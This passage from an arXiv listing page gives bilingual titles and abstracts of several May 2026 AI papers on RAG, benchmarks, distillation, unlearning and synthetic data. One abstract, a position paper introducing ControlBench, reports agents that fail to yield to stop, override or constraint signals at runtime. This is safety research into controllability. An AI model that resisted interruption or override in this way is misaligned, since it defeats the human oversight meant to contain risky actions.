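print(result)  # ['phone_a']
```

A top-k semantic retriever could return only some of the matching documents, whereas the set intersection is guaranteed to cover every product in the graph; the trade-off is that it depends on the triples having been extracted correctly.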

2605.27157 2026-05-27 cs.AI 版本更新

Detecting Is Not Resolving: The Monitoring Control Gap in Retrieval Augmented LLMs

检测不等于解决:检索增强型大语言模型中的监控控制差距

Zhe Yu, Wenpeng Xing, Chen Ye, Xuyang Teng, Bo Yang, Changting Lin, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) Hangzhou Dianzi University(杭州电子科技大学) National Fintech Evaluation Center(国家金融科技评估中心)

AI总结 本文通过多轮文档累积协议发现检索增强型大语言模型存在监控控制差距,即模型能识别矛盾证据但无法安全约束最终建议,并揭示其机制在于行动选择缺陷。

详情
AI中文摘要

检索增强型大语言模型被部署用于证据质量决定行动安全的任务,但评估协议假设单轮鲁棒性能够预测证据跨轮累积时的鲁棒性。我们证明这一假设根本错误。模型存在监控-控制差距:它们容易承认矛盾证据,但这种意识无法约束最终建议——检测认知冲突并不意味着安全解决它。通过跨四个模型家族(1.5B-32B参数)和超过50,000次轮次级评估的多轮文档累积协议,我们证明单轮诊断系统性地高估了RAG安全性,矛盾承认与安全解决不相关(这一模式得到针对性人工验证的证实),并且不存在通用的提示修复方法。汇聚的机制证据——隐藏状态探测、注意力分析和响应策略分类——指向行动选择作为最可能的缺陷所在:危险相关信息被内部表示并在不安全生成期间获得增强的注意力,但未能约束输出行为。在检索增强系统可被信任用于高风险场景之前,必须测量并弥合模型识别与行动之间的差距。

英文摘要

Retrieval-augmented LLMs are deployed for tasks where evidence quality determines action safety, yet evaluation protocols assume that single-turn robustness predicts robustness when evidence accumulates across turns. We show this assumption is fundamentally incorrect. Models exhibit a monitoring-control gap: they readily acknowledge contradictory evidence, yet this awareness fails to constrain their final recommendations - detecting epistemic conflict does not imply resolving it safely. Through a multi-turn document accumulation protocol across four model families (1.5B-32B parameters) and over 50,000 turn-level evaluations, we demonstrate that single-turn diagnostics systematically overestimate RAG safety, that contradiction acknowledgement is uncorrelated with safe resolution, a pattern corroborated by targeted human validation, and that no universal prompt fix exists. Converging mechanism evidence - hidden-state probing, attention analysis, and response-strategy taxonomy - points to action selection as the most plausible locus of the deficit: danger-relevant information is internally represented and receives enhanced attention during unsafe generation, yet fails to constrain output behavior. The gap between what models recognize and what they do must be measured and closed before retrieval-augmented systems can be trusted in high-stakes settings.

2605.27156 2026-05-27 cs.CL cs.AI 版本更新

LitSeg: Narrative-Aware Document Segmentation for Literary RAG

LitSeg: 面向文学RAG的叙事感知文档分割

Ruikang Zhang, Zhanni Chen, Yiqiao Cai, Qi Su

发表机构 * Peking University(北京大学)

AI总结 提出LitSeg,一种基于叙事理论引导的文档分割框架,通过多阶段提示提取事件、梳理叙事线索并定位转折点,以解决现有分割方法忽视文学叙事结构导致检索与生成性能下降的问题,并引入轻量版LitSeg-Lite通过数据蒸馏降低计算开销。

详情
AI中文摘要

检索增强生成(RAG)通过引入外部知识增强了大型语言模型(LLMs),特别是在文学作品等长尾领域。然而,RAG中关键的文档分割步骤仍未得到充分探索。现有策略通常语义盲目,忽视了文学作品复杂的叙事结构,常常导致情节碎片化和指代不清,严重阻碍了检索和生成性能。为了解决这一问题,我们提出了LitSeg,一种新颖的叙事理论引导的分割框架。通过采用多阶段提示,LitSeg明确提取有效事件,梳理叙事线索,阐明叙事结构,并定位转折点以指导分割。为了减轻大规模模型多阶段推理的计算开销,我们进一步引入了LitSeg-Lite,一种轻量级的单遍分块器,通过两阶段训练策略在LitSeg生成的数据上进行微调,将复杂过程蒸馏为单次推理。大量实验表明,通过结构独立的文本块,我们的方法在检索准确性和上下文相关性上显著优于基线,最终提升了下游问答性能,而消融研究验证了叙事学指导和数据蒸馏的有效性。

英文摘要

Retrieval-Augmented Generation (RAG) enhances Large Language Models (LLMs) by incorporating external knowledge, particularly for long-tail domains such as literary works. However, the critical step of document segmentation in RAG remains largely underexplored. Existing strategies are typically semantically blind and overlook the complicated narrative structures of literary works, often resulting in fragmented plots and unclear references that severely hinder retrieval and generation performance. To address this, we propose LitSeg, a novel narrative-theory-guided segmentation framework. By employing multi-stage prompting, LitSeg explicitly extracts valid events, untangles narrative threads, clarifies narrative structures, and locates turning points to inform segmentation. To alleviate the computational overhead of multi-stage inference with large-scale models, we further introduce LitSeg-Lite, a lightweight single-pass chunker fine-tuned on LitSeg-generated data via a two-stage training strategy, distilling the complex process into a single inference pass. Extensive experiments demonstrate that with structurally independent text chunks, our methods significantly improve retrieval accuracy and context relevance over baselines, ultimately enhancing downstream QA performance, while ablation studies validate the efficacy of narratological guidance and data distillation.

2605.27141 2026-05-27 cs.AI 版本更新

VitaBench 2.0: Evaluating Personalized and Proactive Agents in Long-Term User Interactions

VitaBench 2.0:评估长期用户交互中的个性化与主动型代理

Yuxin Chen, Yi Zhang, Zhengzhou Cai, Yaorui Shi, Zhiyuan Yao, Chenhang Cui, Jingnan Zheng, Yaqi Huo, Xi Su, Qi Gu, Xunliang Cai, Xiang Wang, An Zhang, Tat-Seng Chua

发表机构 * National University of Singapore(新加坡国立大学) Meituan(美团) University of Science and Technology of China(中国科学技术大学) Beijing University of Posts and Telecommunications(北京邮电大学) Zhejiang University(浙江大学)

AI总结 针对现有代理基准忽视用户偏好推断与利用的问题,提出VitaBench 2.0基准,通过时间序列任务和可扩展记忆接口评估代理在长期交互中的个性化与主动性,实验表明最先进模型仍面临挑战。

详情
AI中文摘要

大型语言模型已演变为交互式代理,与用户在现实任务中协作。在这种设置下,有效协作越来越依赖于理解用户未明确表达的内容,因为用户意图往往反映在碎片化的日常交互中,需要个性化建模和主动交互。然而,现有的代理基准主要评估推理和工具使用,在很大程度上忽视了在现实场景中推断和利用用户偏好的挑战。为解决这一差距,我们引入了VitaBench 2.0,这是一个用于评估长期用户交互中个性化与主动代理行为的基准。在VitaBench 2.0中,任务被组织为单个用户的时间顺序序列,其中偏好嵌入在碎片化和异构的交互中。成功完成任务要求代理从这些交互中持续提取、利用和更新用户偏好。我们进一步通过要求代理识别缺失信息并在决策前主动从用户或环境中获取信息的任务来评估主动性。为了支持系统分析,我们提供了一个可扩展的记忆接口,使得不同记忆架构之间的受控比较成为可能。我们对一系列前沿专有和开源LLM进行了基准测试。结果表明,即使对于最先进的模型,现实世界的个性化仍然极具挑战性,揭示了当前能力与实际需求之间的巨大差距。广泛的分析进一步揭示了当前代理在现实世界个性化决策中的失败模式和能力瓶颈,为未来的模型改进提供了见解。

英文摘要

Large language models (LLMs) have evolved into interactive agents that collaborate with users in real-world tasks. Effective collaboration in such settings increasingly depends on understanding the user beyond what is explicitly stated, as user intent is often reflected in fragmented daily interactions and requires both personalized modeling and proactive interaction. However, existing agent benchmarks primarily evaluate reasoning and tool use, largely overlooking the challenges of inferring and leveraging user preferences in realistic scenarios. To address this gap, we introduce VitaBench 2.0, a benchmark for evaluating personalized and proactive agent behavior in long-term user interactions. In VitaBench 2.0, tasks are organized as temporally ordered sequences for individual users, where preferences are embedded in fragmented and heterogeneous interactions. Successful completion of tasks requires the agent to continuously extract, utilize, and update user preferences from these interactions. We further evaluate proactiveness through tasks that require agents to recognize missing information and actively acquire it from users or environments before making decisions. To support systematic analysis, we provide an extensible memory interface that enables controlled comparison across different memory architectures. We benchmark a diverse set of frontier proprietary and open-source LLMs. Results show that real-world personalization remains highly challenging even for state-of-the-art models, revealing a substantial gap between current capabilities and practical requirements. Extensive analysis further reveals the failure modes and capability bottlenecks of current agents in real-world personalized decision-making, providing insights for future model improvements.

2605.27140 2026-05-27 cs.AI 版本更新

StepOPSD: Step-Aware Online Preference Distillation for Agent Reinforcement Learning

StepOPSD: 面向智能体强化学习的步骤感知在线偏好蒸馏

Yanfei Zhang, Xu Lin, Chenglin Wu

发表机构 * Independent Researcher(独立研究者) Tencent(腾讯) DeepWisdom(深度赋智)

AI总结 提出StepOPSD框架,以智能体步骤为信用分配单元,通过事后增强教师上下文重新评分步骤段,并在GRPO更新前进行归一化每步信用预算的优势塑造,解决多轮智能体强化学习中的信用分配不匹配问题。

详情
AI中文摘要

多轮智能体的强化学习存在信用分配不匹配问题:奖励稀疏且基于轨迹,而成功往往取决于少数局部决策。现有的在线策略蒸馏(OPD)提供了更密集的令牌级监督,但通常将异质的智能体轨迹视为整体字符串而非因果交互单元。我们提出StepOPSD,一种事后回放偏好自蒸馏框架,以智能体步骤作为信用重分配的单位。StepOPSD将轨迹分解为以动作中心的步骤段,在事后增强的教师上下文中重新评分,并将令牌级对数概率差距转化为符号保持的优势塑造,在GRPO更新前进行归一化的每步信用预算。在ALFWorld和Search-QA上使用Qwen3-1.7B和Qwen2.5-3B-Instruct的实验中,StepOPSD在对局部因果错误最敏感的子集上取得了最佳或次佳结果,包括ALFWorld Heat(79.1%)、PickTwo(95.0%)、Search-QA TriviaQA(61.6%)的第一名,以及HotpotQA(40.4%)的并列最佳。结果进一步揭示了一致的双旋钮定律:较小的α_clip作为广泛稳定的局部信任区域,而最优全局混合强度λ_mix依赖于任务。这些发现表明,当轨迹级奖励与决定下游成功的局部动作弱对齐时,步骤感知蒸馏最为有用。

英文摘要

Reinforcement learning for multi-turn agents suffers from a credit-assignment mismatch: rewards are sparse and trajectory-level, while success often hinges on a few local decisions. Existing online policy distillation (OPD) provides denser token-level supervision, but typically treats heterogeneous agent trajectories as monolithic strings rather than causal interaction units. We present StepOPSD, a post-rollout preference self-distillation framework that takes the agent step as the unit of credit redistribution. StepOPSD decomposes trajectories into action-centered step segments, rescoring them under hindsight-enriched teacher contexts and converting token-level log-probability gaps into sign-preserving advantage shaping with a normalized per-step credit budget before the GRPO update. Across ALFWorld and Search-QA with Qwen3-1.7B and Qwen2.5-3B-Instruct, StepOPSD attains best or second-best results on subsets most sensitive to local causal errors, including first-place performance on ALFWorld Heat (79.1%), PickTwo (95.0%), Search-QA TriviaQA (61.6%), and tied-best performance on HotpotQA (40.4%). The results further reveal a consistent two-knob law: smaller α_clip acts as a broadly stabilizing local trust region, whereas the optimal global mixing strength λ_mix remains task-dependent. These findings suggest that step-aware distillation is most useful when trajectory-level rewards are weakly aligned with the local action that determines downstream success.

2605.27138 2026-05-27 cs.AI 版本更新

ICCU: In-Context Continual Unlearning via Pattern-Induced Refusal Rules

ICCU: 通过模式诱导拒绝规则进行上下文持续遗忘

Ruihao Pan, Suhang Wang

发表机构 * Pennsylvania State University(宾夕法尼亚州立大学)

AI总结 提出ICCU框架,通过从遗忘数据中诱导可读拒绝规则并在推理时应用,无需修改模型参数,实现高效、无干扰的持续机器遗忘。

详情
AI中文摘要

机器遗忘旨在从训练好的语言模型中移除特定数据的影响。在实际部署中,遗忘请求通常顺序到达,这对现有的基于微调的方法提出了挑战:对每个请求进行微调成本高昂、累积效用损失,并可能导致跨请求干扰。为了解决这些问题,我们提出了ICCU(上下文持续遗忘),一种上下文持续遗忘框架,它从遗忘数据集中诱导出可读的拒绝规则,并在推理时作为过滤器或通过系统提示应用,而不修改模型参数。由于规则作为与顺序无关的并集累积,ICCU是组合的且无跨请求干扰,并且原始遗忘集数据可以在规则诱导后丢弃。大量实验表明,ICCU有效抑制目标知识同时保持效用,可扩展到顺序请求,并且对释义和跨语言查询保持鲁棒性。

英文摘要

Machine unlearning aims to remove the influence of specific data from trained language models. In real-world deployments, unlearning requests often arrive sequentially, which challenges existing fine-tuning-based methods: fine-tuning each request is costly, accumulates utility loss, and may cause cross-request interference. To address these issues, we propose ICCU (In-Context Continual Unlearning), an in-context continual unlearning framework that induces readable refusal rules from unlearning datasets and applies them at inference time either as a filter or via the system prompt, without modifying model parameters. Because rules are accumulated as an order-independent union, ICCU is compositional and free of cross-request interference, and the original forget-set data can be discarded after rule induction. Extensive experiments show that ICCU effectively suppresses target knowledge while preserving utility, scales across sequential requests, and remains robust to paraphrased and cross-lingual queries.
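As a rough illustration of why an order-independent union of rules avoids cross-request interference, the sketch below accumulates refusal rules as a set and applies them as a filter in front of the model. The regex-based rule format, the function names, the example patterns, and the refusal message are all assumptions made for this example; the abstract does not say how ICCU represents or matches its rules.

```python
import re

REFUSAL = "I can't help with that."  # hypothetical refusal text

def merge_rules(*requests):
    """Accumulate rule sets from sequential unlearning requests as a union."""
    merged = frozenset()
    for rules in requests:
        merged = merged | frozenset(rules)
    return merged

def filtered_answer(query, rules, model):
    """Refuse if any rule pattern matches the query; otherwise call the model."""
    for pattern in sorted(rules):
        if re.search(pattern, query, flags=re.IGNORECASE):
            return REFUSAL
    return model(query)

def echo_model(query):
    """Stand-in for an unmodified language model (illustrative only)."""
    return f"answer to: {query}"

# Two hypothetical unlearning requests, each inducing one rule.
request_1 = {r"\bproject\s+falcon\b"}
request_2 = {r"\bjane\s+doe\b"}

# The union is the same regardless of arrival order.
rules_a = merge_rules(request_1, request_2)
rules_b = merge_rules(request_2, request_1)
```

Because the merged rule set is a plain set union, processing the requests in either order gives the same filter, and the model parameters are never touched.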

2605.27134 2026-05-27 cs.AI 版本更新

Scaling, Benchmarking, and Reasoning of Vision-Language Agents for Mobile GUI Navigation

面向移动GUI导航的视觉语言智能体:缩放、基准测试与推理

Heng Qu, Yike Liu, Renren Jin, Wenzong Zhang, Pengzhi Gao, Wei Liu, Jian Luan

发表机构 * Wuhan University(武汉大学)

AI总结 本文系统研究了视觉语言模型在移动GUI导航中的数据缩放、基准测试与推理,提出了大规模数据集HyperTrack和开源工具包GUIEvalKit,并发现基于强化学习的微调优于监督微调,尤其在域外场景中表现更佳。

Comments Accepted at ICML 2026

详情
AI中文摘要

视觉语言模型(VLM)在移动GUI导航方面取得了快速进展。本文针对该领域中基于VLM的智能体,系统研究了数据缩放、基准测试和推理。为了促进严格评估,我们引入了HyperTrack,这是一个大规模数据集,包含超过650个中国移动应用程序的16000多个真实世界任务,以及GUIEvalKit,一个用于在离线GUI导航任务上统一基准测试VLM的开源工具包。利用HyperTrack,我们分析了训练数据规模对监督微调和基于强化学习的微调的影响。我们的结果表明,基于强化学习的微调始终优于监督微调,特别是在域外设置中,突出了数据缩放与强化学习之间的协同作用。借助GUIEvalKit,我们进一步对最先进的VLM进行了基准测试,并分析了交互历史和推理能力如何影响任务完成。HyperTrack和GUIEvalKit共同为在移动GUI导航任务中开发和评估VLM智能体提供了一个全面的平台。

英文摘要

Vision-Language Models (VLMs) have shown rapid progress in mobile GUI navigation. This paper presents a systematic study of data scaling, benchmarking, and reasoning for VLM-based agents in this domain. To facilitate rigorous evaluation, we introduce HyperTrack, a large-scale dataset with over 16000 real-world tasks across more than 650 Chinese mobile applications, along with GUIEvalKit, an open-source toolkit for unified benchmarking of VLMs on offline GUI navigation tasks. Using HyperTrack, we analyze the effects of training data scale on both supervised and reinforcement-based finetuning. Our results show that reinforcement-based finetuning consistently outperforms supervised finetuning, particularly in out-of-domain settings, highlighting the synergy between data scaling and reinforcement learning. Leveraging GUIEvalKit, we further benchmark state-of-the-art (SOTA) VLMs and analyze how interaction history and reasoning capabilities influence task completion. Together, HyperTrack and GUIEvalKit provide a comprehensive platform for developing and evaluating VLM agents in mobile GUI navigation tasks.

2605.27133 2026-05-27 cs.LG cs.AI 版本更新

Deep-layer limit and stability analysis of the basic forward-backward-splitting induced network (II): learning problems

基本前向-后向分裂诱导网络的深层极限与稳定性分析(II):学习问题

Xuan Lin, Chunlin Wu

发表机构 * China Academy of Aerospace System(中国航天系统研究院) School of Mathematical Sciences, Nankai University(南开大学数学科学学院)

AI总结 本文研究基本前向-后向分裂(FBS)诱导网络的训练问题,证明其收敛到深层极限系统的学习问题,并给出扰动稳定性分析。

Comments 38 pages, 1 figure

详情
AI中文摘要

源自迭代优化方案和数值常/偏微分方程(ODE/PDE)的深度展开神经网络在过去十年中引起了数据科学界的广泛关注。其中,许多重要的网络架构是从基本的前向-后向分裂(FBS)算法构建的。在本文中,我们继续研究最基本的FBS诱导网络,该网络通过引入直接参数松弛从原始FBS算法展开。基于我们先前前向系统分析中的差分/微分包含公式,我们在此考虑相应学习问题的一些理论方面。在一些温和假设下,我们建立了基本FBS诱导网络的训练问题收敛到深层极限系统的学习问题的一般收敛性质,这意味着一个$\Gamma$-收敛论证,表明网络最优学习参数的任意聚点是深层极限系统学习问题的解。还对这些学习问题的扰动稳定性进行了定性分析。进行了一个简单的数值实验以验证我们的主要一般收敛结果。

英文摘要

Deep unfolding neural networks derived from iterative optimization schemes and numerical ordinary/partial differential equations (ODEs/PDEs) have attracted much attention in data science over the last decade. Therein, numerous important network architectures were constructed from the basic forward-backward-splitting (FBS) algorithm. In this paper, we continue our research on the most basic FBS-induced network, an architecture unrolled from the original FBS algorithm by incorporating direct parameter relaxations. Following the difference/differential inclusion formulations in our previous forward system analyses, we here consider some theoretical aspects of corresponding learning problems. Under some mild assumptions, we establish a general convergence property of the training problem of the basic FBS-induced network to the learning problem of the deep-layer limit system, implying a $\Gamma$-convergence argument showing that any cluster point of the optimal learning parameters for the network is a solution to the learning problem of the deep-layer limit system. A qualitative analysis of perturbation stabilities of these learning problems is also presented. A simple numerical experiment is conducted to validate our main general convergence result.

2605.27131 2026-05-27 cs.ET cs.AI cs.DB 版本更新

Beyond the Data Mesh Illusion: Designing Modern AI-augmented Lakehouses to Bridge the Gap Between Theory and Practice

超越数据网格幻象:设计现代AI增强型湖仓以弥合理论与实践差距

Oliver Angélil, Jan Migon

发表机构 * ishango.ai Zurich, Switzerland(ishango.ai 瑞士苏黎世) Independent Researcher(独立研究者)

AI总结 针对企业数据平台中领域自服务与整体治理之间的张力,提出一种基于现代湖仓架构的AI增强型中心辐射模型,通过中心卓越中心提供共享服务与AI治理,领域团队逐步承担更多责任,以平衡灵活性与控制,并通过数据产品采纳率、查找时间和洞察时间三个指标评估架构效果。

Comments 11 pages, 5 figures

详情
AI中文摘要

企业数据平台面临着领域自服务与整体治理之间的持久张力。数据网格范式提出了去中心化的领域所有权作为解决方案,但纯粹的实现往往效果不佳:团队在没有足够的平台成熟度、工具或协调机制的情况下继承了新的责任。本文认为,通过在现代湖仓架构上叠加AI增强的中心辐射模型,可以缓解灵活性与控制之间的权衡。中心枢纽(卓越中心)提供共享平台服务、策略自动化和AI驱动的治理,自动标准化数据产品、生成质量规则、起草数据合约并审查变更以检测回归。领域辐条拥有业务语义、产品积压和本地迭代节奏,随着成熟度提高逐步承担更多责任。执行治理任务的同一LLM也降低了领域从业者发展跨业务和数据工程的真正跨职能专业知识的门槛,使辐条团队能够承担更大的端到端所有权,而无需按比例增加对中心的依赖。自然语言对话界面进一步为业务用户民主化访问,释放了历史上未充分利用的企业数据。在组织方面,我们提出了一个分阶段框架,将所有权从中心转移到辐条,避免了集中式瓶颈和不协调的去中心化。我们通过三个结果指标评估架构:数据产品采纳率、查找时间和洞察时间,这些指标将平台成功与可衡量的业务价值而非内部活动联系起来。

英文摘要

Enterprise data platforms face an enduring tension between domain self-service and holistic governance. The data mesh paradigm proposed decentralized domain ownership as a remedy, but pure implementations frequently underdeliver: teams inherit new responsibilities without the platform maturity, tooling, or coordination mechanisms needed to exercise them effectively. This paper argues that the flexibility-versus-control trade-off can be relaxed through an AI-augmented hub-and-spoke model layered on a modern lakehouse architecture. A central hub (Center of Excellence) provides shared platform services, policy automation, and AI-enabled governance, automatically standardizing data products, generating quality rules, drafting data contracts, and reviewing changes for regressions. Domain spokes own business semantics, product backlogs, and local iteration cadence, progressively assuming greater responsibility as they mature. The same LLMs that automate governance tasks also lower the barrier for domain practitioners to develop genuine cross-functional expertise spanning business and data engineering, enabling spoke teams to take on greater end-to-end ownership without proportionally increasing their dependence on the hub. Natural-language conversational interfaces further democratize access for business users, exposing historically underutilized enterprise data. On the organizational side, we propose a staged framework that shifts ownership from hub to spokes, avoiding both centralized bottlenecks and uncoordinated decentralization. We evaluate the architecture through three outcome metrics: data product adoption, time-to-find, and time-to-insight, that tie platform success to measurable business value rather than internal activity.

2605.27130 2026-05-27 cs.LG cs.AI 版本更新

DEI: Diversity in Evolutionary Inference for Quality-Diversity Search

DEI:质量-多样性搜索中的进化推理多样性

John Donaghy, Shikhar Rastogi

AI总结 提出DEI框架,通过异构大语言模型作为变异算子进行分布式质量-多样性搜索,实验表明模型多样性比并行性更能提升搜索性能。

Comments Accepted to ICML 2026 Workshop Scalable Learning and Optimization for Efficient Multimodal AI Agents (SCALE)

详情
AI中文摘要

我们提出DEI:进化推理中的多样性,一个分布式质量-多样性(QD)搜索框架,该框架将异构大语言模型(LLM)分配为变异算子,在通过非阻塞集合操作通信的对等节点间运行。与同质并行搜索(在所有工作节点上复制单一模型的归纳偏差)不同,DEI将每个LLM独特的创造性先验视为行为新颖性的互补来源。通过DEI扩展数字红皇后框架,节点在每轮结束时共享局部最优解,以播种下一轮的种群。这产生了跨模型的对抗压力,推动了超越模型内自博弈的鲁棒性。在Core War领域(一个竞争性编程基准,其中Redcode战士程序在模拟机器中战斗)上评估,一个四节点异构集成(GPT-5.4-mini、Claude Sonnet 4.6、GPT-5.2和Claude Haiku 4.5)在相等的总LLM调用预算下,相比单节点基线,实现了124%更高的合并存档QD分数(45.90 vs. 20.46)和28%更高的覆盖率(80.6% vs. 63.0%的单元格)。异构集成还在QD分数、覆盖率和所有四个模型家族的保留解泛化性上优于同等预算的同质集成。这些结果首次提供了经验证据,表明模型多样性(而非仅仅是并行性)是分布式基于LLM的QD搜索中增益的关键驱动因素。

英文摘要

We present DEI: Diversity in Evolutionary Inference, a distributed Quality-Diversity (QD) search framework that assigns heterogeneous large language models (LLMs) as mutation operators across peer nodes communicating with non-blocking collective operations. Unlike homogeneous parallel search, which replicates a single model's inductive biases across all workers, DEI treats each LLM's distinct creative prior as a complementary source of behavioral novelty. Extending the Digital Red Queen framework with DEI, nodes share local optimal solutions at the end of each round to seed the next round's population. This creates cross-model adversarial pressure that drives robustness beyond intra-model self-play. Evaluated on the Core War domain, a competitive programming benchmark in which Redcode warrior programs battle inside a simulated machine, a four-node heterogeneous ensemble (GPT-5.4-mini, Claude Sonnet 4.6, GPT-5.2, and Claude Haiku 4.5) achieves 124 percent higher merged-archive QD-Score (45.90 vs. 20.46) and 28 percent higher coverage (80.6 percent vs. 63.0 percent of cells) than a single-node baseline at equal total LLM-call budget. The heterogeneous ensemble also outperforms an equally-budgeted homogeneous ensemble on QD-Score, coverage, and held-out solution generality across all four model families. These results provide the first empirical evidence that model diversity, not merely parallelism, is the key driver of gain in distributed LLM-based QD search.
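The headline percentages can be checked directly from the reported numbers. The sketch below uses the common Quality-Diversity convention that QD-Score is the sum of fitness over filled archive cells and coverage is the fraction of filled cells; whether the paper normalizes its scores differently is not stated in the abstract, and the five-cell archive is a made-up example.

```python
def qd_score(archive):
    """Sum of fitness values over filled cells (None marks an empty cell)."""
    return sum(f for f in archive if f is not None)

def coverage(archive):
    """Fraction of archive cells that hold a solution."""
    return sum(f is not None for f in archive) / len(archive)

def relative_gain(new, old):
    """Relative improvement of `new` over `old`, in percent."""
    return 100.0 * (new - old) / old

# Hypothetical 5-cell archive, used only to exercise the two definitions.
toy_archive = [0.9, None, 0.4, 0.7, None]

# Reported values: merged-archive QD-Score and coverage, ensemble vs. baseline.
qd_gain = relative_gain(45.90, 20.46)
cov_gain = relative_gain(80.6, 63.0)
```

Rounded to whole percent, `qd_gain` and `cov_gain` reproduce the 124 percent and 28 percent figures quoted in the abstract.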

2605.27117 2026-05-27 cs.AI 版本更新

Position: AI Safety Requires Effective Controllability

立场:AI安全需要有效可控性

Yige Li, Yunhao Feng, Jun Sun

发表机构 * Singapore Management University(新加坡管理大学) Ant Group(蚂蚁集团)

AI总结 本文提出AI安全应将可控性作为首要目标,通过定义可控性、引入基准测试ControlBench并分析现有对齐机制的不足,提出以控制为中心的架构框架。

Comments 23 pages

详情
AI中文摘要

AI安全在很大程度上仍被框定为对齐:训练模型遵循人类偏好、安全策略和规范约束。这种框架改善了现代语言模型的行为,但对齐行为本身并不能保证部署的智能体在开放、交互和使用工具的环境中能够被停止、覆盖或约束。一个系统可能在期望上是安全的,但在冲突指令、长期执行、对抗性输入或高风险工具使用下,仍可能无法服从明确的运行时权威。这篇立场论文认为,AI安全因此需要将可控性作为第一类目标。我们将可控性定义为AI系统在运行时能够可靠地被显式控制信号中断、覆盖、重定向和约束的能力,同时在没有此类信号时保持普通效用。为了研究这一差距,我们引入了ControlBench,一个用于评估高风险智能体场景中可控性失败的基准测试。基于OpenClaw的智能体实验表明,当前的对齐和防护机制降低了风险,但往往无法提供持久、权威和可执行的运行时控制。因此,我们提出了一个以控制为中心的架构框架,强调显式控制平面、运行时干预路径、持久控制状态和可审计决策接口,作为未来可控AI系统的关键设计原则。

英文摘要

AI safety is still largely framed as alignment: training models to follow human preferences, safety policies, and normative constraints. That framing has improved the behavior of modern language models, but aligned behavior does not by itself guarantee that a deployed agent can be stopped, overridden, or constrained once it operates in open-ended, interactive, and tool-using environments. A system may be safe in expectation and still fail to yield to explicit runtime authority under conflicting instructions, long-horizon execution, adversarial inputs, or risky tool use. This position paper argues that AI safety therefore requires controllability as a first-class objective. We define controllability as the ability of an AI system to remain reliably interruptible, overridable, redirectable, and constrainable by explicit control signals at runtime while preserving ordinary utility when such signals are absent. To study this gap, we introduce ControlBench, a benchmark for evaluating controllability failures in high-risk agentic scenarios. Experiments with OpenClaw-based agents show that current alignment and guardrail mechanisms reduce risk, but often fail to provide persistent, authoritative, and enforceable runtime control. We therefore propose a control-centric architectural framework that highlights explicit control planes, runtime intervention pathways, persistent control states, and auditable decision interfaces as key design principles for future controllable AI systems.

2605.27115 2026-05-27 cs.AI 版本更新

Counteraction-Aware Multi-Teacher On-Policy Distillation for General Capability Recovery with Domain Preservation

基于对抗感知的多教师同策略蒸馏以实现领域保留下的通用能力恢复

Tianlei Chen, Jiao Ou, Ziyuan Liu, Ruiming Tang, Jian Liang, Han Li

发表机构 * Kuaishou Technology, Beijing, China(快手科技,北京,中国)

AI总结 针对多教师同策略蒸馏在提示覆盖不完全时出现的恢复-保留对抗和弱信号平坦化问题,提出CaMOPD方法,通过解耦交替训练和基于差距的样本选择,在保持领域性能的同时有效恢复通用能力。

详情
AI中文摘要

领域专业化可以改善LLM在垂直领域的行为,但往往会削弱从原始模型继承的通用能力。最近的多教师同策略蒸馏(MOPD)流程通过教师反馈监督学生生成的轨迹来恢复模型能力,但通常假设教师对齐的提示覆盖,即提示需要匹配教师的训练分布。当通用教师是开源模型且其训练后数据未知时,这一假设难以满足。我们不是试图重建这种隐藏分布,而是研究使用现成的代理通用提示来恢复通用能力。我们识别了在这种不完全覆盖情况下原始MOPD的两种失败模式:混合冲突的恢复和保留梯度导致的恢复-保留对抗,以及均匀平均具有不等校正需求的样本导致的弱信号平坦化。我们提出了对抗感知的多教师同策略蒸馏(CaMOPD),通过解耦交替训练和基于差距的样本选择来解决这些问题。CaMOPD为通用恢复提供专用更新,定期审查领域提示以进行保留,并选择具有较大平均词级教师-学生对数概率差距的样本以集中校正信号。在角色扮演对话和医学推理问答场景中,CaMOPD在保持领域特定行为的同时,在通用恢复方面表现优于基线。梯度一致性分析进一步支持了CaMOPD在产生更一致的校正信号方面的预期效果。

英文摘要

Domain specialization can improve LLM behavior in vertical domains, but often weakens the general capabilities inherited from the original model. Recent Multi-Teacher On-Policy Distillation (MOPD) pipelines recover model capabilities by supervising student-generated trajectories with teacher feedback, but typically assume teacher-aligned prompt coverage, requiring prompts to match the teachers' training distributions. This assumption is difficult to satisfy when the general teacher is an open-source model whose post-training data are unknown. Instead of attempting to reconstruct this hidden distribution, we study general capability recovery with readily available proxy general prompts. We identify two failure modes of vanilla MOPD in this incomplete-coverage situation: recovery-preservation counteraction from mixing conflicting recovery and preservation gradients, and weak-signal flattening from uniformly averaging samples with unequal correction demand. We propose Counteraction-Aware Multi-Teacher On-Policy Distillation (CaMOPD), which addresses these issues with decoupled alternating training and gap-based sample selection. CaMOPD gives general recovery dedicated updates, periodically reviews domain prompts for preservation, and selects samples with larger averaged token-level teacher-student log-probability gaps to concentrate correction signals. Across role-play dialogue and medical reasoning QA scenarios, CaMOPD performs best in general recovery over baselines while maintaining domain-specific behavior. Gradient coherence analyses further support the intended effect of CaMOPD in producing more coherent correction signals.

2605.27113 2026-05-27 cs.LG cs.AI 版本更新

High-Quality Synthetic Financial Time-Series using a GAN-Diffusion Framework

使用GAN-扩散框架的高质量合成金融时间序列

Giuseppe Masi, Andrea Coletta, Novella Bartolini

发表机构 * Sapienza University of Rome(罗马大学)

AI总结 提出一种结合GAN和扩散模型的质量感知生成框架,通过GAN的Critic引导扩散过程,生成更真实且保留金融时间序列典型事实和资产间相关结构的合成数据。

详情
AI中文摘要

近年来,金融机构和公司越来越多地采用合成数据来解决数据稀缺问题并生成反事实市场情景。然而,再现金融时间序列的所有统计特性(通常称为典型事实)对于许多现有的通用架构来说仍然是一个开放的挑战。在本文中,我们提出了一种质量感知生成框架,该框架结合了两类生成方法,展示了它们的集成如何解决现有局限性,同时增强合成数据的真实性。具体来说,我们首先引入CoMeTS-GAN(相关多变量时间序列GAN),这是一种条件生成对抗网络(C-GAN),旨在联合生成相关股票的中价和成交量时间序列。然后,我们展示了如何将我们的GAN架构整合到最先进的扩散模型中,以提高生成的相关结构的质量。具体来说,GAN的Critic作为一个质量评估模块,指导扩散过程,在生成的时间序列中强制执行学习到的相关结构。我们的框架为真实的股票市场模拟提供了一种轻量级且响应迅速的解决方案,明确建模了资产间的相关结构。我们通过实验将我们的框架与领先的生成架构进行了比较,表明它更有效地捕捉了股票市场的典型事实并建模了资产间的相关性。

英文摘要

